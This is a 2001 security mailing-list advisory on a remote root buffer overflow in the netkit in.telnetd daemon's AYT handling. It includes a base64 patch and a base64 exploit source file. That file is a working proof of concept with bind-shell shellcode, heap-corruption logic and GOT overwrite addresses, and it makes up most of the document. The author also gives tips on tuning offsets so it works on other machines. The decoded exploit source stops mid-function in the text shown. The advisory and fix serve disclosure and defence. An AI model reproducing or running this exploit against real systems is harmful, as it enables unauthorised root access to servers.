Date: Fri, 10 Aug 2001 00:14:03 +1200 (NZST)
From: [email protected]
To: [email protected]Subject: ADV/EXP: netkit <=0.17 in.telnetd remote buffer overflow
---1463783680-1194109795-997359229=:10117
Content-Type: TEXT/PLAIN; charset=US-ASCII
************************************************************************
Product: netkit telnet protocol daemon, in.telnetd
Version: netkit-telnet-0.17 (and previous) /usr/sbin/in.telnetd
Severity: High
Remote: Yes
Allows: Remote ROOT level access.
Workaround: Disable telnet access.
Fix: Check with your vendor for an updated package.
************************************************************************
<from http://www.securityfocus.com/archive/1/197804, posted by
<[email protected]>.
To: BugTraq
Subject: multiple vendor telnet daemon vulnerability
Date: Wed Jul 18 2001 22:15:10
...
System | vulnerable | exploitable *
----------------------------------------+--------------+------------
... | |
Linux netkit-telnetd >= 0.14 | no |
... | |
The bug has been discovered by scut. (It is easy to spot, so I do not
want to rule out discoveries by other persons)
...
The tests and further analysis were done by smiler, lorian, zip and scut.
...
<end of message>
TESO were wrong about netkit >=0.14 not being vulnerable.
************************************************************************
Requires: Currently running telnet daemon (often on by default)
/usr/in.telnetd <= netkit-telnet-0.17
(telnet-0.17-7 is the default in.telnetd for Redhat 7.0)
GLIBC > 2.0.6
************************************************************************
Description of problem:
The version of /usr/sbin/in.telnetd that comes as default on Redhat 7.0,
and many other distributions contains an exploitable overflow in the
handling of its output, allowing execution of arbitrary commands.
The problem is in the handling of the AYT commands, as described in the
advisory already linked.
************************************************************************
Exploit details: (the attached file zp-exp-telnetd.c)
If the user has local access to the system, it is possilble to get the
program to set arbitrary environment variables in the environment of
/bin/login.
e.g. LD_PRELOAD=/tmp/make-rootshell.so
By filling the heap, in a similar way to the teso exploit, it its possible
to set 2 or more environment variables.
If the user doesn't have local access, it is possible to overwrite the
chunk header information for a pointer used by setenv(3), and store a new
chunk in a user controllable location, so when the envrionement gets
reallocated it will change the value of arbitrary memory locations.
e.g. You could cause the pointer to set the length of the previous chunk
to the distance back from the chunk to a point in netibuf, which itself
contains a chunk to set the address of a function in the GOT to point to
shellcode, which could also be stored in the network input buffer.
Sometimes bad things happen that you have to kludge to fix. e.g.
push_clean() in the proof of concept exploit. Sometimes I got some
characters from the previous input being sent again, and when that was a
command to set an environment variable or something else that changed the
environment, it kinda messed with malloc calculations a little.
As it is, this exploit will probably not work on your machine, but
carefully modifying appropriate values should fix that.
-- zen-parse
____ http://mp3.com/cosv _______
/ ___\ __ _______ / _____/ __
/ /_____/ \ / ____ \ / / ______/ \__________
\______ /\ \__\ \ \ \ / / /_gone_\__/_platinum_\
\ \/ ______/ \ \/ / \______/ \__________/
\__/ \__/ \__/
-- ObPlug: Buy our CD!
-- Available: For work in the security industry. (email for details)
-------------------------------------------------------------------------
The preceding information, unless directly posted by [email protected] to
an open forum is confidential information and not to be distributed
(without explicit permission being given by [email protected]). Legal
action may be taken to enforce this. If you are mum or dad, this probably
doesn't apply to you.
---1463783680-1194109795-997359229=:10117
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="netkit-telnet-0.17-ayt.patch"
Content-Transfer-Encoding: BASE64
Content-ID: <[email protected]>
Content-Description:
Content-Disposition: attachment; filename="netkit-telnet-0.17-ayt.patch"
LS0tIG5ldGtpdC10ZWxuZXQtMC4xNy90ZWxuZXRkL3V0aWxpdHkuYy5heXQJ
V2VkIEF1ZyAgOCAxNjozMzowMSAyMDAxDQ0KKysrIG5ldGtpdC10ZWxuZXQt
MC4xNy90ZWxuZXRkL3V0aWxpdHkuYwlXZWQgQXVnICA4IDE3OjIwOjM5IDIw
MDENDQpAQCAtNTYsMTggKzU2LDI1IEBADQ0KIHZvaWQNDQogbmV0b3ByaW50
Zihjb25zdCBjaGFyICpmbXQsIC4uLikNDQogew0NCi0gICBpbnQgbGVuLCBt
YXhzaXplOw0NCisgICBpbnQgbGVuID0gMCwgbWF4c2l6ZTsNDQogICAgdmFf
bGlzdCBhcDsNDQogICAgaW50IGRvbmU9MDsNDQogDQ0KICAgIHdoaWxlICgh
ZG9uZSkgew0NCiAgICAgICBtYXhzaXplID0gc2l6ZW9mKG5ldG9idWYpIC0g
KG5mcm9udHAgLSBuZXRvYnVmKTsNDQorICAgICAgaWYgKG1heHNpemUgPCAw
KSB7DQ0KKwkvKiBubyB3YXkgdGhpcyBpcyBnb25uYSBmaXQgLSB0cnkgdG8g
Zmx1c2ggc29tZSAqLw0NCisJbmV0Zmx1c2goKTsNDQorICAgICAgICBtYXhz
aXplID0gc2l6ZW9mKG5ldG9idWYpIC0gKG5mcm9udHAgLSBuZXRvYnVmKTsN
DQorCWlmIChtYXhzaXplIDwgMCkNDQorCSAgYnJlYWs7DQ0KKyAgICAgIH0N
DQogDQ0KICAgICAgIHZhX3N0YXJ0KGFwLCBmbXQpOw0NCiAgICAgICBsZW4g
PSB2c25wcmludGYobmZyb250cCwgbWF4c2l6ZSwgZm10LCBhcCk7DQ0KICAg
ICAgIHZhX2VuZChhcCk7DQ0KIA0NCi0gICAgICBpZiAobGVuPDAgfHwgbGVu
PT1tYXhzaXplKSB7DQ0KKyAgICAgIGlmIChsZW48PTAgfHwgbGVuPT1tYXhz
aXplKSB7DQ0KIAkgLyogZGlkbid0IGZpdCAqLw0NCiAJIG5ldGZsdXNoKCk7
DQ0KICAgICAgIH0NDQotLS0gbmV0a2l0LXRlbG5ldC0wLjE3L3RlbG5ldGQv
dGVsbmV0ZC5jLmF5dAlXZWQgQXVnICA4IDE2OjMzOjAxIDIwMDENDQorKysg
bmV0a2l0LXRlbG5ldC0wLjE3L3RlbG5ldGQvdGVsbmV0ZC5jCVdlZCBBdWcg
IDggMTc6MjE6NDQgMjAwMQ0NCkBAIC0xMjc3LDcgKzEyNzcsNyBAQA0NCiAJ
cmV0dXJuOw0NCiAgICAgfQ0NCiAjZW5kaWYNDQotICAgIG5ldG9wcmludGYo
IlxyXG5bJXMgOiB5ZXNdXHJcbiIsIGhvc3RfbmFtZSk7DQ0KKyAgICBuZXRv
cHJpbnRmKCJcclxuW1llc11cclxuIik7DQ0KIH0NDQogDQ0KIHZvaWQgZG9l
b2Yodm9pZCkgew0NCg==
---1463783680-1194109795-997359229=:10117
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="zp-exp-telnetd.c"
Content-Transfer-Encoding: BASE64
Content-ID: <[email protected]>
Content-Description:
Content-Disposition: attachment; filename="zp-exp-telnetd.c"
I2luY2x1ZGUgPHVuaXN0ZC5oPg0KI2luY2x1ZGUgPHN5cy90eXBlcy5oPg0K
I2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxuZXRpbmV0L2lu
Lmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0K
I2luY2x1ZGUgPGZjbnRsLmg+DQoNCi8qKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioNCiAgICAgICBQcm9vZiBvZiBjb25jZXB0IG5ldGtpdC0wLjE3LTcgbG9j
YWwgcm9vdCBleHBsb2l0Lg0KDQogRXhwbG9pdHMgYnVmZmVyIG92ZXJmbG93
IGluIHRoZSBBWVQgaGFuZGxpbmcgb2YgaW4udGVsbmV0ZCwgDQogZHVlIHRv
IGJhZCBsb2dpYyBpbiB0aGUgaGFuZGxpbmcgb2Ygc25wcmludGYoKSwgYW5k
IA0KDQogICAgICBURVNPIGFkdmlzb3J5IGRldGFpbHMgd2VyZSBlbm91Z2gg
dG8gYWxsb3cgbWUgdG8gcHV0IA0KICAgICAgICBjb250cm9sYWJsZSBhZGRy
ZXNzZXMgaW4gYXJiaXRhcnkgaGVhcCBsb2NhdGlvbnMuIA0KDQogICAgSGVh
cCBiYXNlZCBleHBsb2l0LiBPdmVyZmxvdyBhbGxvd3MgcmV3cml0aW5nIG9m
IHNvbWUgaGVhcCANCiAgICAgZGF0YSwgd2hpY2ggYWxsb3dlZCBtZSB0byBw
dXQgYSBuZXcgaGVhcCBzdHJ1Y3R1cmUgaW4gdGhlIA0KICAgICAgICAgIGlu
cHV0IGJ1ZmZlciwgd2hpY2ggbGV0IG1lIGRvIHdoYXRldmVyIEkgd2FudC4N
Cg0KJ3RyYWNlcm91dGUgZXhwbG9pdCBzdG9yeSAtICBCeSBEdm9yYWssIFN5
bm5lcmd5IE5ldHdvcmtzJyB3YXMgdmVyeQ0KIGhlbHBmdWwuIEFsc28gbWFs
bG9jLmMgd2FzIGdvb2QuIA0KDQoqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKiov
DQovKg0KICAgICAgICAgICAgICAgICAgICAgICAgIE5vdGVzIGFib3V0IGV4
cGxvaXQgICAgICAgICAgICAgICAgICAgICAgIA0KDQoxKSBSZWRIYXQgNy4w
LCBleHBsb2l0aW5nIGxvY2FsaG9zdA0KMikgaG9zdG5hbWUgaXMgY2xhcml0
eS5sb2NhbA0KMykgSXQgcHJvYmFibHkgd29uJ3Qgd29yayB3aXRob3V0IGF0
IGxlYXN0IGEgZGlmZmVyZW50IHNldHRpbmcgZm9yDQogICB0aGUgLS1zaXpl
IG9wdGlvbiwgYW5kIHByb2JhYmx5IHRoZSAtLW5hbWUgb3B0aW9uIGFzIHdl
bGwuIFRoZQ0KICAgLS1uYW1lIGFyZ3VlbW50ICBpcyB0aGUgaG9zdG5hbWUg
cGFydCBvZiB0aGUgc3RyaW5nIHRoYXQgZ2V0cyANCiAgIHJldHVybmVkIGJ5
IHRoZSBBWVQgY29tbWFuZCwgd2hpY2ggbWF5IGJlIGRpZmZlcmVudCB0byB0
aGUgbmFtZQ0KICAgb2YgdGhlIGFkZHJlc3MgeW91IGFyZSBjb25uZWN0aW5n
IHRvLi4NCjQpIFRoZXJlIGFyZSBhIGxvdCBvZiB0aGluZ3MgdGhhdCB1c2Ug
dGhlIGhlYXAsIG1ha2luZyB0aGUgc2l6ZSANCiAgIGRlcGVuZCBvbiBhbG90
IG9mIGZhY3RvcnMuIA0KDQo1KSBZb3Ugd2lsbCBtaWdodCBuZWVkIHRvIGNo
YW5nZSBzb21lIChvciBhbGwpIG9mIHRoZSBvZmZzZXRzLiANCiAgIFRoaXMg
cHJvZ3JhbSBkb2VzIGFsbG93IHlvdSB0byBicnV0ZSBmb3JjZSwgaWYgdGhl
IGhvc3RuYW1lIHJldHVybmVkIA0KICAgYnkgdGhlIEFZVCBjb21tYW5kIGlz
IG5vdCBhIG11bHRpcGxlIG9mIDMgbGV0dGVycyBsb25nLg0KIA0KIEl0IGlz
IGFsc28gcG9zc2libHkgKGF0IGxlYXN0IGFjY29yZGluZyB0byBzb21lIHF1
aWNrIHRlc3RpbmcgSSBkaWQpDQogZXhwbG9pdGFibGUgb24gc29tZSAoYWxs
Pykgc2VydmVycyB3aXRoIG5hbWVzIHRoYXQgYXJlIG11bHRpcGxlcyBvZiB0
aHJlZQ0KIGxldHRlcnMgbG9uZywgdXNpbmcgdGhlIEFib3J0IE91dHB1dCBj
b21tYW5kIHRvIGFkZCAyIGNoYXJhY3RlcnMgdG8gdGhlDQogb3V0cHV0IGxl
bmd0aCwgYW5kIGV4cGxvaXQgdGhlIGhlYXAgaW4gYSBzaW1pbGFyIG1hbm5l
ciB0byB0aGlzIG1ldGhvZC4NCiANCiAoWW91IGNhbiBvbmx5IGRpcmVjdGx5
IHB1dCB1c2VyIGNvbnRyb2xhYmxlIGNoYXJhY3RlcnMgaW4gMiBvdXQgb2Yg
Mw0KIGxvY2F0aW9ucyAoaWU6IG5vIEFPIHdpbGwgZ2l2ZSB5b3UgYSBtdWx0
aXBsZSBvZiAzIGJ5dGVzIG9uIHRoZSBoZWFwLCBBTw0KIHdpbGwgZ2l2ZSB5
b3UgMiBtb3JlIHRoYW4gYSBtdWx0aXBsZSBvZiAzIGJ5dGVzKSB3aXRoIGNv
bnRyb2xsYWJsZQ0KIGNoYXJhY3RlcnMsIGJ1dCB3aGVuIHlvdSBjb3VudCB0
aGUgbnVsbCBhZGRlZCBieSB0aGUgbmV0b3ByaW50ZigpLCBhbmQgdXNlDQog
MCBhcyBhbiBvcHRpb24gdG8gYSBkbyBvciB3aWxsLCB5b3UgY2FuIHNvbWV0
aW1lcyBjcmVhdGUgdmFsaWQgY2h1bmtzIHRoYXQNCiBwb2ludCB0byBsb2Nh
dGlvbnMgeW91IGNhbiBjb250cm9sLiBJIGhhdmUgb25seSB0ZXN0ZWQgdGhp
cyBtZXRob2Qgd2l0aCBhIA0KIHNpbXVsYXRpb24sIGJ1dCBpdCBzZWVtcyBp
dCB3b3VsZCBwcm9iYWJseSB3b3JrIHdpdGggdGhlIHRlbG5ldGQgYXMgd2Vs
bC4NCiBJIHdpbGwgbG9vayBpbnRvIGl0IHdoZW4gSSBoYXZlIHRpbWUuIE1h
eWJlLikNCiANCg0KICAgICAgICAgICAgICAgICAgICAgICAuICAuICBfICBf
ICAgXyAgXyAuICAuICAgICBfICBfICBfIC4gIC4NCiB8XyAgX3xfIF98XyAg
XyAuICAvIC8gfFwvfCB8X3wgX3wgfCAgfCB8fFwvfCAgLyB8ICB8IHx8XyB8
ICB8DQogfCB8ICB8ICAgfCAgfF98LiAvIC8gIHwgIHwgfCAgIF98LnxfIHxf
fHwgIHwgLyAgfF8gfF98IF98IFwvIA0KICAgICAgICAgICAgIHwNCiAqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKiovDQoNCg0KDQoNCiNkZWZpbmUgU0VSVkVS
X1BPUlQgMjMNCg0KI2RlZmluZSBFTlYgMTg2MjgNCg0KaW50IG9mZnNldDEy
W10gPSB7DQovLyBuZXRpYnVmWzM0M10tPnRoZSBjaHVuayBzdGFydC4NCiAg
LTQsIDB4YWEsDQogIC01LCAweGJiLA0KICAtNiwgMHhjYywNCiAgLTcsIDB4
MTAsDQogIC05LCAweGRkLA0KICAtMTAsIDB4NjgsDQogIC0xMiwgMHhlZSwN
CiAgLTEzLCAweDg4LA0KICAtMTQsIDB4OTksDQogIDAsIDB4MDANCn07DQoN
CmludCBvZmZzZXQzW109ew0KLTEsMHgwMCwNCjAsMA0KfTsNCg0KaW50ICpv
ZmZzZXRzPW9mZnNldDEyOw0KDQoNCmludCBkYWxlbiA9IDA7DQppbnQgYmln
Ow0KaW50IHNtYWxsOw0KaW50IG1pcGwgPSAwOw0KaW50IG5pbmJ1Zm9mZnNl
dDsNCmNoYXIgc3BpbmNoYXJzW10gPSAiL3xcXC0iOw0KDQpjaGFyIHRvc2Vu
ZFtdID0gew0KICAweGZmLCAweGZkLCAweDAzLCAweGZmLCAweGZiLCAweDE4
LCAweGZmLCAweGZiLCAweDFmLCAweGZmLCAweGZiLCAweDIwLA0KICAweGZm
LCAweGZiLCAweDIxLCAweGZmLCAweGZiLCAweDIyLCAweGZmLCAweGZiLCAw
eDI3LCAweGZmLCAweGZkLCAweDA1LA0KICAweGZmLCAweGZiLCAweDIzLCAw
DQp9Ow0KDQpjaGFyIGxhbWFncmFfYmluZF9jb2RlW10gPQ0KLy8gdGhlIE5P
UHMgYXJlIG15IHBhcnQuLi4gdG8ganVtcCBvdmVyIHRoZSBtb2RpZmllZCBw
bGFjZXMsIA0KLy8gd2l0aG91dCBtZSBoYXZpbmcgdG8gdGFrZSBhIGxvb2sg
dG8gc2VlIHdoZXJlIHRoZXkgYXJlLg0KLy8gTW9kaWZpZWQgdG8gbGlzdGVu
IG9uIDc0NjUgPT0gVEFHUyBhbmQgd29yayB0aHJ1IFRFTE5FVCBwcm90b2Nv
bC4NCiAgIlx4OTBceGViXHgyMFx4OTBceDkwXHhlYlx4MjBceDkwXHg5MFx4
ZWJceDIwXHg5MFx4OTBceGViXHgyMFx4OTBceDkwIg0KICAiXHhlYlx4MjBc
eDkwXHg5MFx4ZWJceDIwXHg5MFx4OTBceGViXHgyMFx4OTBceDkwXHhlYlx4
MjBceDkwXHg5MCINCiAgIlx4ZWJceDIwXHg5MFx4OTBceGViXHgyMFx4OTBc
eDkwXHhlYlx4MjBceDkwXHg5MFx4ZWJceDIwXHg5MFx4OTAiDQogICJceGVi
XHgyMFx4OTBceDkwXHhlYlx4MjBceDkwXHg5MFx4ZWJceDIwXHg5MFx4OTBc
eGViXHgyMFx4OTBceDkwIg0KICAiXHhlYlx4MjBceDkwXHg5MFx4ZWJceDIw
XHg5MFx4OTBceGViXHgyMFx4OTBceDkwXHhlYlx4MjBceDkwXHg5MCINCiAg
Ilx4ZWJceDIwXHg5MFx4OTBceGViXHgyMFx4OTBceDkwXHhlYlx4MjBceDkw
XHg5MFx4ZWJceDIwXHg5MFx4OTAiDQogICJceDkwXHg5MFx4OTBceDkwXHg5
MFx4OTBceDkwXHg5MFx4OTBceDkwXHg5MFx4OTBceDkwXHg5MFx4OTBceDkw
Ig0KICAiXHg5MFx4OTBceDkwXHg5MFx4OTBceDkwXHg5MFx4OTBceDkwXHg5
MFx4OTBceDkwXHg5MFx4OTBceDkwXHg5MCINCiAgIlx4ODlceGU1XHgzMVx4
ZDJceGIyXHg2Nlx4ODlceGQwXHgzMVx4YzlceDg5XHhjYlx4NDNceDg5XHg1
ZFx4ZjgiDQogICJceDQzXHg4OVx4NWRceGY0XHg0Ylx4ODlceDRkXHhmY1x4
OGRceDRkXHhmNFx4Y2RceDgwXHgzMVx4YzlceDg5Ig0KICAiXHg0NVx4ZjRc
eDQzXHg2Nlx4ODlceDVkXHhlY1x4NjZceGM3XHg0NVx4ZWVceDFkXHgyOVx4
ODlceDRkXHhmMCINCiAgIlx4OGRceDQ1XHhlY1x4ODlceDQ1XHhmOFx4YzZc
eDQ1XHhmY1x4MTBceDg5XHhkMFx4OGRceDRkXHhmNFx4Y2QiDQogICJceDgw
XHg4OVx4ZDBceDQzXHg0M1x4Y2RceDgwXHg4OVx4ZDBceDQzXHhjZFx4ODBc
eDg5XHhjM1x4MzFceGM5Ig0KICAiXHhiMlx4M2ZceDg5XHhkMFx4Y2RceDgw
XHg4OVx4ZDBceDQxXHhjZFx4ODBceGViXHgxOFx4NWVceDg5XHg3NSINCiAg
Ilx4MDhceDMxXHhjMFx4ODhceDQ2XHgwN1x4ODlceDQ1XHgwY1x4YjBceDBi
XHg4OVx4ZjNceDhkXHg0ZFx4MDgiDQogICJceDhkXHg1NVx4MGNceGNkXHg4
MFx4ZThceGUzIg0KICAiXHhmZlx4ZmZceGZmXHhmZlx4ZmZceGZmL2Jpbi9z
aCI7DQoNCmNoYXIgKnNoZWxsY29kZSA9IGxhbWFncmFfYmluZF9jb2RlOw0K
DQppbnQgc29jazsJCQkvKiBmZCBmb3Igc29ja2V0IGNvbm5lY3Rpb24gKi8N
CkZJTEUgKmRhc29jazsJCQkvKiBmb3IgZG9pbmcgZnByaW50IGV0IGFsICAg
Ki8NCnN0cnVjdCBzb2NrYWRkcl9pbiBzZXJ2ZXI7CS8qIHRoZSBzZXJ2ZXIg
ZW5kIG9mIHRoZSBzb2NrZXQgICovDQpzdHJ1Y3QgaG9zdGVudCAqaHA7CQkv
KiBSZXR1cm4gdmFsdWUgZnJvbSBnZXRob3N0YnluYW1lKCkgKi8NCmNoYXIg
YnVmWzQwOTYwXTsJCS8qIFJlY2VpdmVkIGRhdGEgYnVmZmVyICovDQpjaGFy
IHNvY2tfYnVmWzY0ICogMTAyNF07CS8qIFJlY2VpdmVkIGRhdGEgYnVmZmVy
ICovDQoNCmNoYXIgZGFlbnZbMTAwMDBdOw0KY2hhciBvbGRlbnZbMTAwMDBd
Ow0KDQpleHRlcm4gaW50IGVycm5vOw0KcmVhZF9zb2NrICgpDQp7DQogIC8q
IFByZXBhcmUgb3VyIGJ1ZmZlciBmb3IgYSByZWFkIGFuZCB0aGVuIHJlYWQu
ICovDQogIGJ6ZXJvIChidWYsIHNpemVvZiAoYnVmKSk7DQogIGlmIChyZWFk
IChzb2NrLCBidWYsIHNpemVvZiAoYnVmKSkgPCAwKQ0KICAgIGlmIChlcnJu
byAhPSAxMSkNCiAgICAgIHsNCglwZXJyb3IgKCIhIFNvY2tldCByZWFkIik7
DQoJZXhpdCAoMSk7DQogICAgICB9DQp9DQoNCnNvY2tfc2V0dXAgKCkNCnsN
CiAgaW50IGZsYWdzOw0KICBpbnQgeWVzID0gMTsNCiAgaWYgKChzb2NrID0g
c29ja2V0IChBRl9JTkVULCBTT0NLX1NUUkVBTSwgMCkpIDwgMCkNCiAgICB7
DQogICAgICBwZXJyb3IgKCIhIEVycm9yIG1ha2luZyB0aGUgc29ja2V0XG4i
KTsNCiAgICAgIGV4aXQgKDEpOw0KICAgIH0NCiAgYnplcm8gKChjaGFyICop
ICZzZXJ2ZXIsIHNpemVvZiAoc2VydmVyKSk7DQogIHNlcnZlci5zaW5fZmFt
aWx5ID0gQUZfSU5FVDsNCiAgaWYgKChocCA9IGdldGhvc3RieW5hbWUgKCJs
b2NhbGhvc3QiKSkgPT0gTlVMTCkNCiAgICB7DQogICAgICBmcHJpbnRmIChz
dGRlcnIsICIhIGxvY2FsaG9zdCB1bmtub3duPz9cbiIpOw0KICAgICAgZXhp
dCAoMSk7DQogICAgfQ0KICBiY29weSAoaHAtPmhfYWRkciwgJnNlcnZlci5z
aW5fYWRkciwgaHAtPmhfbGVuZ3RoKTsNCiAgc2VydmVyLnNpbl9wb3J0ID0g
aHRvbnMgKCh1X3Nob3J0KSBTRVJWRVJfUE9SVCk7DQoNCiAgLyogVHJ5IHRv
IGNvbm5lY3QgKi8NCiAgaWYgKGNvbm5lY3QgKHNvY2ssIChzdHJ1Y3Qgc29j
a2FkZHIgKikgJnNlcnZlciwgc2l6ZW9mIChzZXJ2ZXIpKSA8IDApDQogICAg
ew0KICAgICAgcGVycm9yICgiISBFcnJvciBjb25uZWN0aW5nXG4iKTsNCiAg
ICAgIGV4aXQgKDEpOw0KICAgIH0NCg0KICBkYXNvY2sgPSAoRklMRSAqKSBm
ZG9wZW4gKHNvY2ssICJ3KyIpOw0KICBpZiAoIWRhc29jaykNCiAgICB7DQog
ICAgICBwZXJyb3IgKCIhIEJhZCBmZG9wZW4gaGFwcGVuZWQiKTsNCiAgICAg
IGV4aXQgKDEpOw0KICAgIH0NCg0KLyoqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioNCiBUaGFua3MgdG8geHBoYW50b20gZm9yIHRo
ZSBuZXh0IDQgbGluZXMuDQogKHdoaWNoIGkgZG9uJ3QgbmVlZCBhbnltb3Jl
ICAgOz8gKQ0KIA0KICBmbGFncyA9IGZjbnRsKHNvY2ssIEZfR0VURkwsIDAp
OyANCiAgZmxhZ3MgfD0gT19OT05CTE9DSzsgDQogIGZjbnRsKHNvY2ssIEZf
U0VURkwsIGZsYWdzKTsNCiAgaWYgKHNldHNvY2tvcHQoc29jaywgU09MX1NP
Q0tFVCwgU09fT09CSU5MSU5FLCAmeWVzLHNpemVvZih5ZXMpKSA9PSAtMSkg
ew0KICAgICAgICBwZXJyb3IoInNldHNvY2tvcHQiKTsNCiAgICAgICAgZXhp
dCgxKTsNCiAgfSAgDQoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKi8NCg0KDQogIHNldGJ1ZmZlciAoZGFzb2NrLCBzb2NrX2J1
ZiwgNjQgKiAxMDI0KTsNCg0KfQ0KDQpkb19pYWMgKGNoYXIgYykNCnsNCiAg
cHV0YyAoMHhmZiwgZGFzb2NrKTsNCiAgcHV0YyAoYywgZGFzb2NrKTsNCn0N
Cg0KZG9fYXl0ICgpDQp7DQogIGRvX2lhYyAoMHhmNik7IC8vIHNldHMgYnVm
ZmVyIGxlbmd0aCB0byAyDQp9DQoNCmRvbyAoY2hhciBjKQ0Kew0KICBwdXRj
ICgyNTUsIGRhc29jayk7DQogIHB1dGMgKDI1MywgZGFzb2NrKTsNCiAgcHV0
YyAoYywgZGFzb2NrKTsNCn0NCndpbGwgKGNoYXIgYykNCnsNCiAgcHV0YyAo
MjU1LCBkYXNvY2spOw0KICBwdXRjICgyNTEsIGRhc29jayk7DQogIHB1dGMg
KGMsIGRhc29jayk7DQp9DQp3b250IChjaGFyIGMpDQp7DQogIHB1dGMgKDI1
NSwgZGFzb2NrKTsNCiAgcHV0YyAoMjUyLCBkYXNvY2spOw0KICBwdXRjIChj
LCBkYXNvY2spOw0KfQ0KDQp2b2lkDQpzb2x2ZSAoaW50IHJlbWFpbikNCnsN
CiAgaW50IHgsIHk7DQogIGJpZyA9IC0xMDA7DQogIHNtYWxsID0gLTEwMDsN
CiAgZm9yICh4ID0gMDsgeCA8IDEyMDsgeCsrKQ0KICAgIGZvciAoeSA9IDI7
IHkgPCA4MDsgeSsrKQ0KICAgICAgew0KCWlmICgoKHkgKiAzKSArICh4ICog
ZGFsZW4pKSA9PSByZW1haW4pDQoJICB7DQoJICAgIGJpZyA9IHg7DQoJICAg
IHNtYWxsID0geTsNCgkgICAgcmV0dXJuOw0KCSAgfQ0KICAgICAgfQ0KICAg
ICAgZnByaW50ZiAoc3RkZXJyLCAiSSBzdGlsbCBjYW4ndCB3b3JrIGl0IG91
dC5cblxuIik7DQogICAgICBleGl0ICgxKTsNCn0NCg0KcHVzaF9jbGVhbiAo
KQ0Kew0KICBpbnQgbDsNCiAgZm9yIChsID0gMDsgbCA8IDgxOTI7IGwrKykN
CiAgICBwdXRjICgwLCBkYXNvY2spOwkNCn0NCg0KcHVzaF9oZWFwX2F0dGFj
ayAoKQ0Kew0KICBpbnQgbDsNCiAgaW50IHNoYWRkciA9IDB4ODA1Yzk3MDsN
CiAgaW50IG92ZXJ3cml0ZSA9IDB4MDgwNTFlNzg7CS8vIGZvcGVuDQogIGlu
dCB0b3NlbmRbXSA9IHsNCiAgICAweDgwNTY3MGViLA0KICAgIDB4OCwNCiAg
ICBzaGFkZHIsDQogICAgc2hhZGRyLA0KICAgIDB4MCwNCiAgICAweDAsDQog
ICAgb3ZlcndyaXRlIC0gMTIsDQogICAgc2hhZGRyDQogIH07DQogIGZ3cml0
ZSAoc2hlbGxjb2RlLCBzdHJsZW4gKHNoZWxsY29kZSksIDEsIGRhc29jayk7
DQogIGZvciAobCA9IHN0cmxlbiAoc2hlbGxjb2RlKTsgbCA8IDI4OSArIG5p
bmJ1Zm9mZnNldDsgbCsrKQ0KICAgIHB1dGMgKDAsIGRhc29jayk7DQogIGZ3
cml0ZSAodG9zZW5kLCA4LCA0LCBkYXNvY2spOw0KICBmZmx1c2ggKGRhc29j
ayk7DQp9DQoNCmZpbGwyIChpbnQgY291bnQsIGNoYXIgd2l0aCwgaW50IHJl
YWwpDQp7DQogIGludCBsOw0KICBpbnQgZmlyc3QsIHJlc3QsIGZpbmQ7DQoN
CiAgZmlyc3QgPSAoaW50KSAoY291bnQgLyBkYWxlbikgLSAxMDsNCiAgcmVz
dCA9IChpbnQpICgoKGNvdW50KSAlIGRhbGVuKSAvIDMpICogMzsNCiAgZmlu
ZCA9IGNvdW50IC0gKChmaXJzdCAqIGRhbGVuKSArIChyZXN0ICogMykpOw0K
ICBzb2x2ZSAoZmluZCk7DQogIGZpcnN0ICs9IGJpZzsNCiAgcmVzdCArPSBz
bWFsbDsNCiAgZm9yIChsID0gMDsgbCA8IGZpcnN0OyBsKyspDQogICAgZG9f
YXl0ICgpOw0KICBmb3IgKGwgPSAwOyBsIDwgcmVzdDsgbCsrKQ0KICAgIHdp
bGwgKHdpdGgpOw0KICBpZiAocmVhbCA9PSAxKQ0KICAgIHsNCiAgICAgIHB1
c2hfY2xlYW4gKCk7DQogICAgfQ0KfQ0KDQpmaWxsIChpbnQgY291bnQsIGNo
YXIgd2l0aCkNCnsNCiAgZnByaW50ZiAoc3RkZXJyLCAiICBvIExlbmd0aCAl
ZCBjaGFyICVkICglMDJ4KVxuIiwNCgkgICBjb3VudCwgd2l0aCAmIDB4ZmYs
IHdpdGggJiAweGZmKTsNCiAgZmZsdXNoIChzdGRlcnIpOw0KICBmaWxsMiAo
ODI1NywgJ3onLCAwKTsJCS8vIGZpcnN0IHBhcnQNCiAgZmlsbDIgKGNvdW50
IC0gODI1Nywgd2l0aCwgMSk7CS8vIGRvIGl0IGZvciByZWFsDQp9DQoNCmRv
ZW52IChjaGFyICpkYW5hbSwgY2hhciAqZGF2YWwpDQp7DQogIHNwcmludGYg
KGRhZW52LCAiJWMlYyVjJWMlYyVzJWMlcyVjJWMiLA0KICAgICAgIC8qICBJ
QUMgICBTQiBOLUUgSVMgVkFSICBuYW1lIFZBTCB2YWx1ZSAgSUFDICBTRSAg
Ki8NCgkgICAyNTUsIDI1MCwgMzksIDAsIDAsIGRhbmFtLCAxLCBkYXZhbCwg
MjU1LCAyNDApOw0KDQogIGZ3cml0ZSAoZGFlbnYsIDUxMiwgMSwgZGFzb2Nr
KTsNCiAgZmZsdXNoIChkYXNvY2spOw0KfQ0KDQptYWluIChpbnQgYXJnYywg
Y2hhciAqYXJndltdKQ0Kew0KICBpbnQgYnIsIGwsIGRvc2xlZXAgPSAwOw0K
ICBpbnQgcGVyY2VudCA9IDA7DQogIGNoYXIgc3BpbjsNCiAgdW5zaWduZWQg
Y2hhciB3Ow0KICBiemVybyAob2xkZW52LCBzaXplb2YgKG9sZGVudikpOw0K
ICBhcmd2Kys7DQogIGRhbGVuID0gc3RybGVuICgiY2xhcml0eS5sb2NhbCIp
Ow0KICB3aGlsZSAoYXJndlswXSkNCiAgICB7DQogICAgICBpZiAoIXN0cmNt
cCAoYXJndlswXSwgIi0tcGF1c2UiKSkNCglkb3NsZWVwID0gMTsNCg0KICAg
ICAgaWYgKCFzdHJjbXAgKGFyZ3ZbMF0sICItLXNpemUiKSAmJiBhcmd2WzFd
